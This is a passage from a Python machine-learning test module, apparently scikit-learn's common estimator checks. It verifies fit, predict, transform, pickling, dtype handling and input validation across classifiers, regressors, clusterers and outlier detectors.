        # densify so np.ravel yields comparable flat arrays
        result_full = result_full.A
        result_by_batch = [x.A for x in result_by_batch]

    return np.ravel(result_full), np.ravel(result_by_batch)


@ignore_warnings(category=FutureWarning)
def check_methods_subset_invariance(name, estimator_orig, strict_mode=True):
    # check that method gives invariant results if applied
    # on mini batches or the whole set
    rnd = np.random.RandomState(0)
    X = 3 * rnd.uniform(size=(20, 3))
    X = _pairwise_estimator_convert_X(X, estimator_orig)
    y = X[:, 0].astype(int)
    estimator = clone(estimator_orig)
    y = _enforce_estimator_tags_y(estimator, y)

    # shrink model size so the check stays cheap
    if hasattr(estimator, "n_components"):
        estimator.n_components = 1
    if hasattr(estimator, "n_clusters"):
        estimator.n_clusters = 1
    set_random_state(estimator, 1)
    estimator.fit(X, y)

    for method in ["predict", "transform", "decision_function",
                   "score_samples", "predict_proba"]:

        msg = ("{method} of {name} is not invariant when applied "
               "to a subset.").format(method=method, name=name)

        if hasattr(estimator, method):
            # whole-set result vs. concatenated per-row results must agree
            result_full, result_by_batch = _apply_on_subsets(
                getattr(estimator, method), X)
            assert_allclose(result_full, result_by_batch,
                            atol=1e-7, err_msg=msg)


@ignore_warnings
def check_fit2d_1sample(name, estimator_orig, strict_mode=True):
    # Check that fitting a 2d array with only one sample either works or
    # returns an informative message. The error message should either mention
    # the number of samples or the number of classes.
    rnd = np.random.RandomState(0)
    X = 3 * rnd.uniform(size=(1, 10))
    X = _pairwise_estimator_convert_X(X, estimator_orig)
    y = X[:, 0].astype(int)
    estimator = clone(estimator_orig)
    y = _enforce_estimator_tags_y(estimator, y)

    if hasattr(estimator, "n_components"):
        estimator.n_components = 1
    if hasattr(estimator, "n_clusters"):
        estimator.n_clusters = 1
    set_random_state(estimator, 1)

    # min_cluster_size cannot be less than the data size for OPTICS.
    if name == 'OPTICS':
        estimator.set_params(min_samples=1)

    # error messages accepted as "informative" for the 1-sample case
    msgs = ["1 sample", "n_samples = 1", "n_samples=1", "one sample",
            "1 class", "one class"]

    try:
        estimator.fit(X, y)
    except ValueError as e:
        if all(msg not in repr(e) for msg in msgs):
            raise e


@ignore_warnings
def check_fit2d_1feature(name, estimator_orig, strict_mode=True):
    # check fitting a 2d array with only 1 feature either works or returns
    # informative message
    rnd = np.random.RandomState(0)
    X = 3 * rnd.uniform(size=(10, 1))
    X = _pairwise_estimator_convert_X(X, estimator_orig)
    y = X[:, 0].astype(int)
    estimator = clone(estimator_orig)
    y = _enforce_estimator_tags_y(estimator, y)

    if hasattr(estimator, "n_components"):
        estimator.n_components = 1
    if hasattr(estimator, "n_clusters"):
        estimator.n_clusters = 1
    # ensure two labels in subsample for RandomizedLogisticRegression
    if name == 'RandomizedLogicRegression' if False else name == 'RandomizedLogisticRegression':
        estimator.sample_fraction = 1
    # ensure non skipped trials for RANSACRegressor
    if name == 'RANSACRegressor':
        estimator.residual_threshold = 0.5

    # NOTE(review): y is passed through _enforce_estimator_tags_y a second
    # time here; appears redundant with the call above — confirm upstream.
    y = _enforce_estimator_tags_y(estimator, y)

    set_random_state(estimator, 1)

    # error messages accepted as "informative" for the 1-feature case
    msgs = ["1 feature(s)", "n_features = 1", "n_features=1"]

    try:
        estimator.fit(X, y)
    except ValueError as e:
        if all(msg not in repr(e) for msg in msgs):
            raise e


@ignore_warnings
def check_fit1d(name, estimator_orig, strict_mode=True):
    # check fitting 1d X array raises a ValueError
    rnd = np.random.RandomState(0)
    X = 3 * rnd.uniform(size=(20))
    y = X.astype(int)
    estimator = clone(estimator_orig)
    tags = estimator._get_tags()
    if tags["no_validation"]:
        # FIXME
this is a bit loose return y = _enforce_estimator_tags_y(estimator, y) if hasattr(estimator, "n_components"): estimator.n_components = 1 if hasattr(estimator, "n_clusters"): estimator.n_clusters = 1 set_random_state(estimator, 1) assert_raises(ValueError, estimator.fit, X, y) @ignore_warnings(category=FutureWarning) def check_transformer_general(name, transformer, readonly_memmap=False, strict_mode=True): X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]], random_state=0, n_features=2, cluster_std=0.1) X = StandardScaler().fit_transform(X) X -= X.min() X = _pairwise_estimator_convert_X(X, transformer) if readonly_memmap: X, y = create_memmap_backed_data([X, y]) _check_transformer(name, transformer, X, y) @ignore_warnings(category=FutureWarning) def check_transformer_data_not_an_array(name, transformer, strict_mode=True): X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]], random_state=0, n_features=2, cluster_std=0.1) X = StandardScaler().fit_transform(X) # We need to make sure that we have non negative data, for things # like NMF X -= X.min() - .1 X = _pairwise_estimator_convert_X(X, transformer) this_X = _NotAnArray(X) this_y = _NotAnArray(np.asarray(y)) _check_transformer(name, transformer, this_X, this_y) # try the same with some list _check_transformer(name, transformer, X.tolist(), y.tolist()) @ignore_warnings(category=FutureWarning) def check_transformers_unfitted(name, transformer, strict_mode=True): X, y = _regression_dataset() transformer = clone(transformer) with assert_raises((AttributeError, ValueError), msg="The unfitted " "transformer {} does not raise an error when " "transform is called. 
Perhaps use " "check_is_fitted in transform.".format(name)): transformer.transform(X) def _check_transformer(name, transformer_orig, X, y, strict_mode=True): n_samples, n_features = np.asarray(X).shape transformer = clone(transformer_orig) set_random_state(transformer) # fit if name in CROSS_DECOMPOSITION: y_ = np.c_[np.asarray(y), np.asarray(y)] y_[::2, 1] *= 2 if isinstance(X, _NotAnArray): y_ = _NotAnArray(y_) else: y_ = y transformer.fit(X, y_) # fit_transform method should work on non fitted estimator transformer_clone = clone(transformer) X_pred = transformer_clone.fit_transform(X, y=y_) if isinstance(X_pred, tuple): for x_pred in X_pred: assert x_pred.shape[0] == n_samples else: # check for consistent n_samples assert X_pred.shape[0] == n_samples if hasattr(transformer, 'transform'): if name in CROSS_DECOMPOSITION: X_pred2 = transformer.transform(X, y_) X_pred3 = transformer.fit_transform(X, y=y_) else: X_pred2 = transformer.transform(X) X_pred3 = transformer.fit_transform(X, y=y_) if transformer_orig._get_tags()['non_deterministic']: msg = name + ' is non deterministic' raise SkipTest(msg) if isinstance(X_pred, tuple) and isinstance(X_pred2, tuple): for x_pred, x_pred2, x_pred3 in zip(X_pred, X_pred2, X_pred3): assert_allclose_dense_sparse( x_pred, x_pred2, atol=1e-2, err_msg="fit_transform and transform outcomes " "not consistent in %s" % transformer) assert_allclose_dense_sparse( x_pred, x_pred3, atol=1e-2, err_msg="consecutive fit_transform outcomes " "not consistent in %s" % transformer) else: assert_allclose_dense_sparse( X_pred, X_pred2, err_msg="fit_transform and transform outcomes " "not consistent in %s" % transformer, atol=1e-2) assert_allclose_dense_sparse( X_pred, X_pred3, atol=1e-2, err_msg="consecutive fit_transform outcomes " "not consistent in %s" % transformer) assert _num_samples(X_pred2) == n_samples assert _num_samples(X_pred3) == n_samples # raises error on malformed input for transform if hasattr(X, 'shape') and \ not 
transformer._get_tags()["stateless"] and \ X.ndim == 2 and X.shape[1] > 1: # If it's not an array, it does not have a 'T' property with assert_raises(ValueError, msg="The transformer {} does " "not raise an error when the number of " "features in transform is different from" " the number of features in " "fit.".format(name)): transformer.transform(X[:, :-1]) @ignore_warnings def check_pipeline_consistency(name, estimator_orig, strict_mode=True): if estimator_orig._get_tags()['non_deterministic']: msg = name + ' is non deterministic' raise SkipTest(msg) # check that make_pipeline(est) gives same score as est X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]], random_state=0, n_features=2, cluster_std=0.1) X -= X.min() X = _pairwise_estimator_convert_X(X, estimator_orig, kernel=rbf_kernel) estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) set_random_state(estimator) pipeline = make_pipeline(estimator) estimator.fit(X, y) pipeline.fit(X, y) funcs = ["score", "fit_transform"] for func_name in funcs: func = getattr(estimator, func_name, None) if func is not None: func_pipeline = getattr(pipeline, func_name) result = func(X, y) result_pipe = func_pipeline(X, y) assert_allclose_dense_sparse(result, result_pipe) @ignore_warnings def check_fit_score_takes_y(name, estimator_orig, strict_mode=True): # check that all estimators accept an optional y # in fit and score so they can be used in pipelines rnd = np.random.RandomState(0) n_samples = 30 X = rnd.uniform(size=(n_samples, 3)) X = _pairwise_estimator_convert_X(X, estimator_orig) y = np.arange(n_samples) % 3 estimator = clone(estimator_orig) y = _enforce_estimator_tags_y(estimator, y) set_random_state(estimator) funcs = ["fit", "score", "partial_fit", "fit_predict", "fit_transform"] for func_name in funcs: func = getattr(estimator, func_name, None) if func is not None: func(X, y) args = [p.name for p in signature(func).parameters.values()] if args[0] == "self": # 
if_delegate_has_method makes methods into functions # with an explicit "self", so need to shift arguments args = args[1:] assert args[1] in ["y", "Y"], ( "Expected y or Y as second argument for method " "%s of %s. Got arguments: %r." % (func_name, type(estimator).__name__, args)) @ignore_warnings def check_estimators_dtypes(name, estimator_orig, strict_mode=True): rnd = np.random.RandomState(0) X_train_32 = 3 * rnd.uniform(size=(20, 5)).astype(np.float32) X_train_32 = _pairwise_estimator_convert_X(X_train_32, estimator_orig) X_train_64 = X_train_32.astype(np.float64) X_train_int_64 = X_train_32.astype(np.int64) X_train_int_32 = X_train_32.astype(np.int32) y = X_train_int_64[:, 0] y = _enforce_estimator_tags_y(estimator_orig, y) methods = ["predict", "transform", "decision_function", "predict_proba"] for X_train in [X_train_32, X_train_64, X_train_int_64, X_train_int_32]: estimator = clone(estimator_orig) set_random_state(estimator, 1) estimator.fit(X_train, y) for method in methods: if hasattr(estimator, method): getattr(estimator, method)(X_train) def check_transformer_preserve_dtypes( name, transformer_orig, strict_mode=True ): # check that dtype are preserved meaning if input X is of some dtype # X_transformed should be from the same dtype. 
X, y = make_blobs( n_samples=30, centers=[[0, 0, 0], [1, 1, 1]], random_state=0, cluster_std=0.1, ) X = StandardScaler().fit_transform(X) X -= X.min() X = _pairwise_estimator_convert_X(X, transformer_orig) for dtype in transformer_orig._get_tags()["preserves_dtype"]: X_cast = X.astype(dtype) transformer = clone(transformer_orig) set_random_state(transformer) X_trans = transformer.fit_transform(X_cast, y) if isinstance(X_trans, tuple): # cross-decompostion returns a tuple of (x_scores, y_scores) # when given y with fit_transform; only check the first element X_trans = X_trans[0] # check that the output dtype is preserved assert X_trans.dtype == dtype, ( f'Estimator transform dtype: {X_trans.dtype} - ' f'original/expected dtype: {dtype.__name__}' ) @ignore_warnings(category=FutureWarning) def check_estimators_empty_data_messages(name, estimator_orig, strict_mode=True): e = clone(estimator_orig) set_random_state(e, 1) X_zero_samples = np.empty(0).reshape(0, 3) # The precise message can change depending on whether X or y is # validated first. Let us test the type of exception only: with assert_raises(ValueError, msg="The estimator {} does not" " raise an error when an empty data is used " "to train. Perhaps use " "check_array in train.".format(name)): e.fit(X_zero_samples, []) X_zero_features = np.empty(0).reshape(3, 0) # the following y should be accepted by both classifiers and regressors # and ignored by unsupervised models y = _enforce_estimator_tags_y(e, np.array([1, 0, 1])) msg = (r"0 feature\(s\) \(shape=\(3, 0\)\) while a minimum of \d* " "is required.") assert_raises_regex(ValueError, msg, e.fit, X_zero_features, y) @ignore_warnings(category=FutureWarning) def check_estimators_nan_inf(name, estimator_orig, strict_mode=True): # Checks that Estimator X's do not contain NaN or inf. 
rnd = np.random.RandomState(0) X_train_finite = _pairwise_estimator_convert_X(rnd.uniform(size=(10, 3)), estimator_orig) X_train_nan = rnd.uniform(size=(10, 3)) X_train_nan[0, 0] = np.nan X_train_inf = rnd.uniform(size=(10, 3)) X_train_inf[0, 0] = np.inf y = np.ones(10) y[:5] = 0 y = _enforce_estimator_tags_y(estimator_orig, y) error_string_fit = "Estimator doesn't check for NaN and inf in fit." error_string_predict = ("Estimator doesn't check for NaN and inf in" " predict.") error_string_transform = ("Estimator doesn't check for NaN and inf in" " transform.") for X_train in [X_train_nan, X_train_inf]: # catch deprecation warnings with ignore_warnings(category=FutureWarning): estimator = clone(estimator_orig) set_random_state(estimator, 1) # try to fit try: estimator.fit(X_train, y) except ValueError as e: if 'inf' not in repr(e) and 'NaN' not in repr(e): print(error_string_fit, estimator, e) traceback.print_exc(file=sys.stdout) raise e except Exception as exc: print(error_string_fit, estimator, exc) traceback.print_exc(file=sys.stdout) raise exc else: raise AssertionError(error_string_fit, estimator) # actually fit estimator.fit(X_train_finite, y) # predict if hasattr(estimator, "predict"): try: estimator.predict(X_train) except ValueError as e: if 'inf' not in repr(e) and 'NaN' not in repr(e): print(error_string_predict, estimator, e) traceback.print_exc(file=sys.stdout) raise e except Exception as exc: print(error_string_predict, estimator, exc) traceback.print_exc(file=sys.stdout) else: raise AssertionError(error_string_predict, estimator) # transform if hasattr(estimator, "transform"): try: estimator.transform(X_train) except ValueError as e: if 'inf' not in repr(e) and 'NaN' not in repr(e): print(error_string_transform, estimator, e) traceback.print_exc(file=sys.stdout) raise e except Exception as exc: print(error_string_transform, estimator, exc) traceback.print_exc(file=sys.stdout) else: raise AssertionError(error_string_transform, estimator) 
@ignore_warnings
def check_nonsquare_error(name, estimator_orig, strict_mode=True):
    """Test that error is thrown when non-square data provided."""
    # Only meaningful for pairwise estimators: X has 20 samples but 10
    # features, so a precomputed-kernel/distance estimator must reject it.
    X, y = make_blobs(n_samples=20, n_features=10)
    estimator = clone(estimator_orig)

    with assert_raises(ValueError, msg="The pairwise estimator {}"
                       " does not raise an error on non-square data"
                       .format(name)):
        estimator.fit(X, y)


@ignore_warnings
def check_estimators_pickle(name, estimator_orig, strict_mode=True):
    """Test that we can pickle all estimators."""
    # Methods whose output must survive a pickle round-trip unchanged.
    check_methods = ["predict", "transform", "decision_function",
                     "predict_proba"]

    X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
                      random_state=0, n_features=2, cluster_std=0.1)

    # some estimators can't do features less than 0
    X -= X.min()
    X = _pairwise_estimator_convert_X(X, estimator_orig, kernel=rbf_kernel)

    tags = estimator_orig._get_tags()
    # include NaN values when the estimator should deal with them
    if tags['allow_nan']:
        # set randomly 10 elements to np.nan
        rng = np.random.RandomState(42)
        mask = rng.choice(X.size, 10, replace=False)
        X.reshape(-1)[mask] = np.nan

    estimator = clone(estimator_orig)

    y = _enforce_estimator_tags_y(estimator, y)

    set_random_state(estimator)
    estimator.fit(X, y)

    # pickle and unpickle!
    # sklearn estimators embed a "version" marker in their pickles so that
    # unpickling under a different sklearn version can warn.
    pickled_estimator = pickle.dumps(estimator)
    if estimator.__module__.startswith('sklearn.'):
        assert b"version" in pickled_estimator
    unpickled_estimator = pickle.loads(pickled_estimator)

    result = dict()
    for method in check_methods:
        if hasattr(estimator, method):
            result[method] = getattr(estimator, method)(X)

    for method in result:
        unpickled_result = getattr(unpickled_estimator, method)(X)
        assert_allclose_dense_sparse(result[method], unpickled_result)


@ignore_warnings(category=FutureWarning)
def check_estimators_partial_fit_n_features(name, estimator_orig,
                                            strict_mode=True):
    # check if number of features changes between calls to partial_fit.
if not hasattr(estimator_orig, 'partial_fit'): return estimator = clone(estimator_orig) X, y = make_blobs(n_samples=50, random_state=1) X -= X.min() y = _enforce_estimator_tags_y(estimator_orig, y) try: if is_classifier(estimator): classes = np.unique(y) estimator.partial_fit(X, y, classes=classes) else: estimator.partial_fit(X, y) except NotImplementedError: return with assert_raises(ValueError, msg="The estimator {} does not raise an" " error when the number of features" " changes between calls to " "partial_fit.".format(name)): estimator.partial_fit(X[:, :-1], y) @ignore_warnings(category=FutureWarning) def check_classifier_multioutput(name, estimator, strict_mode=True): n_samples, n_labels, n_classes = 42, 5, 3 tags = estimator._get_tags() estimator = clone(estimator) X, y = make_multilabel_classification(random_state=42, n_samples=n_samples, n_labels=n_labels, n_classes=n_classes) estimator.fit(X, y) y_pred = estimator.predict(X) assert y_pred.shape == (n_samples, n_classes), ( "The shape of the prediction for multioutput data is " "incorrect. Expected {}, got {}." .format((n_samples, n_labels), y_pred.shape)) assert y_pred.dtype.kind == 'i' if hasattr(estimator, "decision_function"): decision = estimator.decision_function(X) assert isinstance(decision, np.ndarray) assert decision.shape == (n_samples, n_classes), ( "The shape of the decision function output for " "multioutput data is incorrect. Expected {}, got {}." .format((n_samples, n_classes), decision.shape)) dec_pred = (decision > 0).astype(int) dec_exp = estimator.classes_[dec_pred] assert_array_equal(dec_exp, y_pred) if hasattr(estimator, "predict_proba"): y_prob = estimator.predict_proba(X) if isinstance(y_prob, list) and not tags['poor_score']: for i in range(n_classes): assert y_prob[i].shape == (n_samples, 2), ( "The shape of the probability for multioutput data is" " incorrect. Expected {}, got {}." 
.format((n_samples, 2), y_prob[i].shape)) assert_array_equal( np.argmax(y_prob[i], axis=1).astype(int), y_pred[:, i] ) elif not tags['poor_score']: assert y_prob.shape == (n_samples, n_classes), ( "The shape of the probability for multioutput data is" " incorrect. Expected {}, got {}." .format((n_samples, n_classes), y_prob.shape)) assert_array_equal(y_prob.round().astype(int), y_pred) if (hasattr(estimator, "decision_function") and hasattr(estimator, "predict_proba")): for i in range(n_classes): y_proba = estimator.predict_proba(X)[:, i] y_decision = estimator.decision_function(X) assert_array_equal(rankdata(y_proba), rankdata(y_decision[:, i])) @ignore_warnings(category=FutureWarning) def check_regressor_multioutput(name, estimator, strict_mode=True): estimator = clone(estimator) n_samples = n_features = 10 if not _is_pairwise_metric(estimator): n_samples = n_samples + 1 X, y = make_regression(random_state=42, n_targets=5, n_samples=n_samples, n_features=n_features) X = _pairwise_estimator_convert_X(X, estimator) estimator.fit(X, y) y_pred = estimator.predict(X) assert y_pred.dtype == np.dtype('float64'), ( "Multioutput predictions by a regressor are expected to be" " floating-point precision. Got {} instead".format(y_pred.dtype)) assert y_pred.shape == y.shape, ( "The shape of the orediction for multioutput data is incorrect." 
" Expected {}, got {}.") @ignore_warnings(category=FutureWarning) def check_clustering(name, clusterer_orig, readonly_memmap=False, strict_mode=True): clusterer = clone(clusterer_orig) X, y = make_blobs(n_samples=50, random_state=1) X, y = shuffle(X, y, random_state=7) X = StandardScaler().fit_transform(X) rng = np.random.RandomState(7) X_noise = np.concatenate([X, rng.uniform(low=-3, high=3, size=(5, 2))]) if readonly_memmap: X, y, X_noise = create_memmap_backed_data([X, y, X_noise]) n_samples, n_features = X.shape # catch deprecation and neighbors warnings if hasattr(clusterer, "n_clusters"): clusterer.set_params(n_clusters=3) set_random_state(clusterer) if name == 'AffinityPropagation': clusterer.set_params(preference=-100) clusterer.set_params(max_iter=100) # fit clusterer.fit(X) # with lists clusterer.fit(X.tolist()) pred = clusterer.labels_ assert pred.shape == (n_samples,) assert adjusted_rand_score(pred, y) > 0.4 if clusterer._get_tags()['non_deterministic']: return set_random_state(clusterer) with warnings.catch_warnings(record=True): pred2 = clusterer.fit_predict(X) assert_array_equal(pred, pred2) # fit_predict(X) and labels_ should be of type int assert pred.dtype in [np.dtype('int32'), np.dtype('int64')] assert pred2.dtype in [np.dtype('int32'), np.dtype('int64')] # Add noise to X to test the possible values of the labels labels = clusterer.fit_predict(X_noise) # There should be at least one sample in every cluster. Equivalently # labels_ should contain all the consecutive values between its # min and its max. 
    labels_sorted = np.unique(labels)
    # labels must be consecutive integers from min to max (no gaps)
    assert_array_equal(labels_sorted, np.arange(labels_sorted[0],
                                                labels_sorted[-1] + 1))

    # Labels are expected to start at 0 (no noise) or -1 (if noise)
    assert labels_sorted[0] in [0, -1]
    # Labels should be less than n_clusters - 1
    if hasattr(clusterer, 'n_clusters'):
        n_clusters = getattr(clusterer, 'n_clusters')
        assert n_clusters - 1 >= labels_sorted[-1]
    # else labels should be less than max(labels_) which is necessarily true


@ignore_warnings(category=FutureWarning)
def check_clusterer_compute_labels_predict(name, clusterer_orig,
                                           strict_mode=True):
    """Check that predict is invariant of compute_labels."""
    X, y = make_blobs(n_samples=20, random_state=0)
    clusterer = clone(clusterer_orig)
    set_random_state(clusterer)

    if hasattr(clusterer, "compute_labels"):
        # MiniBatchKMeans
        X_pred1 = clusterer.fit(X).predict(X)
        clusterer.set_params(compute_labels=False)
        X_pred2 = clusterer.fit(X).predict(X)
        assert_array_equal(X_pred1, X_pred2)


@ignore_warnings(category=FutureWarning)
def check_classifiers_one_label(name, classifier_orig, strict_mode=True):
    # A classifier trained on a single class must either raise an
    # informative ValueError or predict that class everywhere.
    error_string_fit = "Classifier can't train when only one class is present."
    error_string_predict = ("Classifier can't predict when only one class is "
                            "present.")
    rnd = np.random.RandomState(0)
    X_train = rnd.uniform(size=(10, 3))
    X_test = rnd.uniform(size=(10, 3))
    y = np.ones(10)
    # catch deprecation warnings
    with ignore_warnings(category=FutureWarning):
        classifier = clone(classifier_orig)
        # try to fit
        try:
            classifier.fit(X_train, y)
        except ValueError as e:
            # a ValueError mentioning 'class' is the acceptable rejection
            if 'class' not in repr(e):
                print(error_string_fit, classifier, e)
                traceback.print_exc(file=sys.stdout)
                raise e
            else:
                return
        except Exception as exc:
            print(error_string_fit, classifier, exc)
            traceback.print_exc(file=sys.stdout)
            raise exc
        # predict
        try:
            assert_array_equal(classifier.predict(X_test), y)
        except Exception as exc:
            print(error_string_predict, classifier, exc)
            raise exc


@ignore_warnings  # Warnings are raised by decision function
def check_classifiers_train(name, classifier_orig, readonly_memmap=False,
                            X_dtype='float64', strict_mode=True):
    # Core classifier contract: fit/predict shapes, training accuracy,
    # input validation, and agreement between predict and
    # decision_function / predict_proba, on binary and multiclass blobs.
    X_m, y_m = make_blobs(n_samples=300, random_state=0)
    X_m = X_m.astype(X_dtype)
    X_m, y_m = shuffle(X_m, y_m, random_state=7)
    X_m = StandardScaler().fit_transform(X_m)
    # generate binary problem from multi-class one
    y_b = y_m[y_m != 2]
    X_b = X_m[y_m != 2]

    if name in ['BernoulliNB', 'MultinomialNB', 'ComplementNB',
                'CategoricalNB']:
        X_m -= X_m.min()
        X_b -= X_b.min()

    if readonly_memmap:
        X_m, y_m, X_b, y_b = create_memmap_backed_data([X_m, y_m, X_b, y_b])

    problems = [(X_b, y_b)]
    tags = classifier_orig._get_tags()
    if not tags['binary_only']:
        problems.append((X_m, y_m))

    for (X, y) in problems:
        classes = np.unique(y)
        n_classes = len(classes)
        n_samples, n_features = X.shape
        classifier = clone(classifier_orig)
        X = _pairwise_estimator_convert_X(X, classifier)
        y = _enforce_estimator_tags_y(classifier, y)

        set_random_state(classifier)
        # raises error on malformed input for fit
        if not tags["no_validation"]:
            with assert_raises(
                ValueError,
                msg="The classifier {} does not "
                    "raise an error when incorrect/malformed input "
                    "data for fit is passed. The number of training "
                    "examples is not the same as the number of labels. "
                    "Perhaps use check_X_y in fit.".format(name)):
                classifier.fit(X, y[:-1])

        # fit
        classifier.fit(X, y)
        # with lists
        classifier.fit(X.tolist(), y.tolist())
        assert hasattr(classifier, "classes_")
        y_pred = classifier.predict(X)

        assert y_pred.shape == (n_samples,)
        # training set performance
        if not tags['poor_score']:
            assert accuracy_score(y, y_pred) > 0.83

        # raises error on malformed input for predict
        msg_pairwise = (
            "The classifier {} does not raise an error when shape of X in "
            " {} is not equal to (n_test_samples, n_training_samples)")
        msg = ("The classifier {} does not raise an error when the number of "
               "features in {} is different from the number of features in "
               "fit.")

        if not tags["no_validation"]:
            if _is_pairwise(classifier):
                with assert_raises(ValueError,
                                   msg=msg_pairwise.format(name, "predict")):
                    classifier.predict(X.reshape(-1, 1))
            else:
                with assert_raises(ValueError,
                                   msg=msg.format(name, "predict")):
                    classifier.predict(X.T)
        if hasattr(classifier, "decision_function"):
            try:
                # decision_function agrees with predict
                decision = classifier.decision_function(X)
                if n_classes == 2:
                    if not tags["multioutput_only"]:
                        assert decision.shape == (n_samples,)
                    else:
                        assert decision.shape == (n_samples, 1)
                    dec_pred = (decision.ravel() > 0).astype(int)
                    assert_array_equal(dec_pred, y_pred)
                else:
                    assert decision.shape == (n_samples, n_classes)
                    assert_array_equal(np.argmax(decision, axis=1), y_pred)

                # raises error on malformed input for decision_function
                if not tags["no_validation"]:
                    if _is_pairwise(classifier):
                        with assert_raises(ValueError, msg=msg_pairwise.format(
                                name, "decision_function")):
                            classifier.decision_function(X.reshape(-1, 1))
                    else:
                        with assert_raises(ValueError, msg=msg.format(
                                name, "decision_function")):
                            classifier.decision_function(X.T)
            except NotImplementedError:
                pass

        if hasattr(classifier, "predict_proba"):
            # predict_proba agrees with predict
            y_prob = classifier.predict_proba(X)
            assert y_prob.shape == (n_samples, n_classes)
            assert_array_equal(np.argmax(y_prob, axis=1), y_pred)
            # check that probas for all classes sum to one
            assert_array_almost_equal(np.sum(y_prob, axis=1),
                                      np.ones(n_samples))
            if not tags["no_validation"]:
                # raises error on malformed input for predict_proba
                if _is_pairwise(classifier_orig):
                    with assert_raises(ValueError, msg=msg_pairwise.format(
                            name, "predict_proba")):
                        classifier.predict_proba(X.reshape(-1, 1))
                else:
                    with assert_raises(ValueError, msg=msg.format(
                            name, "predict_proba")):
                        classifier.predict_proba(X.T)
            if hasattr(classifier, "predict_log_proba"):
                # predict_log_proba is a transformation of predict_proba
                y_log_prob = classifier.predict_log_proba(X)
                assert_allclose(y_log_prob, np.log(y_prob), 8, atol=1e-9)
                assert_array_equal(np.argsort(y_log_prob),
                                   np.argsort(y_prob))


def check_outlier_corruption(num_outliers, expected_outliers, decision,
                             strict_mode=True):
    # Check for deviation from the precise given contamination level that may
    # be due to ties in the anomaly scores.
    if num_outliers < expected_outliers:
        start = num_outliers
        end = expected_outliers + 1
    else:
        start = expected_outliers
        end = num_outliers + 1

    # ensure that all values in the 'critical area' are tied,
    # leading to the observed discrepancy between provided
    # and actual contamination levels.
    sorted_decision = np.sort(decision)
    msg = ('The number of predicted outliers is not equal to the expected '
           'number of outliers and this difference is not explained by the '
           'number of ties in the decision_function values')
    assert len(np.unique(sorted_decision[start:end])) == 1, msg


def check_outliers_train(name, estimator_orig, readonly_memmap=True,
                         strict_mode=True):
    # Outlier-detector contract: predict returns {-1, 1}, decision_function
    # and score_samples agree with predict, and the contamination parameter
    # controls the outlier proportion.
    n_samples = 300
    X, _ = make_blobs(n_samples=n_samples, random_state=0)
    X = shuffle(X, random_state=7)

    if readonly_memmap:
        X = create_memmap_backed_data(X)

    n_samples, n_features = X.shape
    estimator = clone(estimator_orig)
    set_random_state(estimator)

    # fit
    estimator.fit(X)
    # with lists
    estimator.fit(X.tolist())

    y_pred = estimator.predict(X)
    assert y_pred.shape == (n_samples,)
    assert y_pred.dtype.kind == 'i'
    assert_array_equal(np.unique(y_pred), np.array([-1, 1]))

    decision = estimator.decision_function(X)
    scores = estimator.score_samples(X)
    for output in [decision, scores]:
        assert output.dtype == np.dtype('float')
        assert output.shape == (n_samples,)

    # raises error on malformed input for predict
    assert_raises(ValueError, estimator.predict, X.T)

    # decision_function agrees with predict
    dec_pred = (decision >= 0).astype(int)
    dec_pred[dec_pred == 0] = -1
    assert_array_equal(dec_pred, y_pred)

    # raises error on malformed input for decision_function
    assert_raises(ValueError, estimator.decision_function, X.T)

    # decision_function is a translation of score_samples
    y_dec = scores - estimator.offset_
    assert_allclose(y_dec, decision)

    # raises error on malformed input for score_samples
    assert_raises(ValueError, estimator.score_samples, X.T)

    # contamination parameter (not for OneClassSVM which has the nu parameter)
    if (hasattr(estimator, 'contamination')
            and not hasattr(estimator, 'novelty')):
        # proportion of outliers equal to contamination parameter when not
        # set to 'auto'. This is true for the training set and cannot thus be
        # checked as follows for estimators with a novelty parameter such as
        # LocalOutlierFactor (tested in check_outliers_fit_predict)
        expected_outliers = 30
        contamination = expected_outliers / n_samples
        estimator.set_params(contamination=contamination)
        estimator.fit(X)
        y_pred = estimator.predict(X)

        num_outliers = np.sum(y_pred != 1)
        # num_outliers should be equal to expected_outliers unless
        # there are ties in the decision_function values. this can
        # only be tested for estimators with a decision_function
        # method, i.e. all estimators except LOF which is already
        # excluded from this if branch.
        if num_outliers != expected_outliers:
            decision = estimator.decision_function(X)
            check_outlier_corruption(num_outliers, expected_outliers,
                                     decision)

        # raises error when contamination is a scalar and not in [0,1]
        for contamination in [-0.5, 2.3]:
            estimator.set_params(contamination=contamination)
            assert_raises(ValueError, estimator.fit, X)


@ignore_warnings(category=(FutureWarning))
def check_classifiers_multilabel_representation_invariance(
        name, classifier_orig, strict_mode=True):
    # Predictions must be identical whether the multilabel y is passed as
    # an ndarray, a list of lists, or a list of arrays.
    X, y = make_multilabel_classification(n_samples=100, n_features=20,
                                          n_classes=5, n_labels=3,
                                          length=50, allow_unlabeled=True,
                                          random_state=0)

    X_train, y_train = X[:80], y[:80]
    X_test = X[80:]

    y_train_list_of_lists = y_train.tolist()
    y_train_list_of_arrays = list(y_train)

    classifier = clone(classifier_orig)
    set_random_state(classifier)

    y_pred = classifier.fit(X_train, y_train).predict(X_test)

    y_pred_list_of_lists = classifier.fit(
        X_train, y_train_list_of_lists).predict(X_test)

    y_pred_list_of_arrays = classifier.fit(
        X_train, y_train_list_of_arrays).predict(X_test)

    assert_array_equal(y_pred, y_pred_list_of_arrays)
    assert_array_equal(y_pred, y_pred_list_of_lists)

    assert y_pred.dtype == y_pred_list_of_arrays.dtype
    assert y_pred.dtype == y_pred_list_of_lists.dtype
    assert type(y_pred) == type(y_pred_list_of_arrays)
    assert type(y_pred) == type(y_pred_list_of_lists)


@ignore_warnings(category=FutureWarning)
def check_estimators_fit_returns_self(name, estimator_orig,
                                      readonly_memmap=False,
                                      strict_mode=True):
    """Check if self is returned when calling fit."""
    X, y = make_blobs(random_state=0, n_samples=21)
    # some want non-negative input
    X -= X.min()
    X = _pairwise_estimator_convert_X(X, estimator_orig)

    estimator = clone(estimator_orig)
    y = _enforce_estimator_tags_y(estimator, y)

    if readonly_memmap:
        X, y = create_memmap_backed_data([X, y])

    set_random_state(estimator)
    assert estimator.fit(X, y) is estimator


@ignore_warnings
def check_estimators_unfitted(name, estimator_orig, strict_mode=True):
    """Check that predict raises an exception in an unfitted estimator.

    Unfitted estimators should raise a NotFittedError.
    """
    # Common test for Regressors, Classifiers and Outlier detection estimators
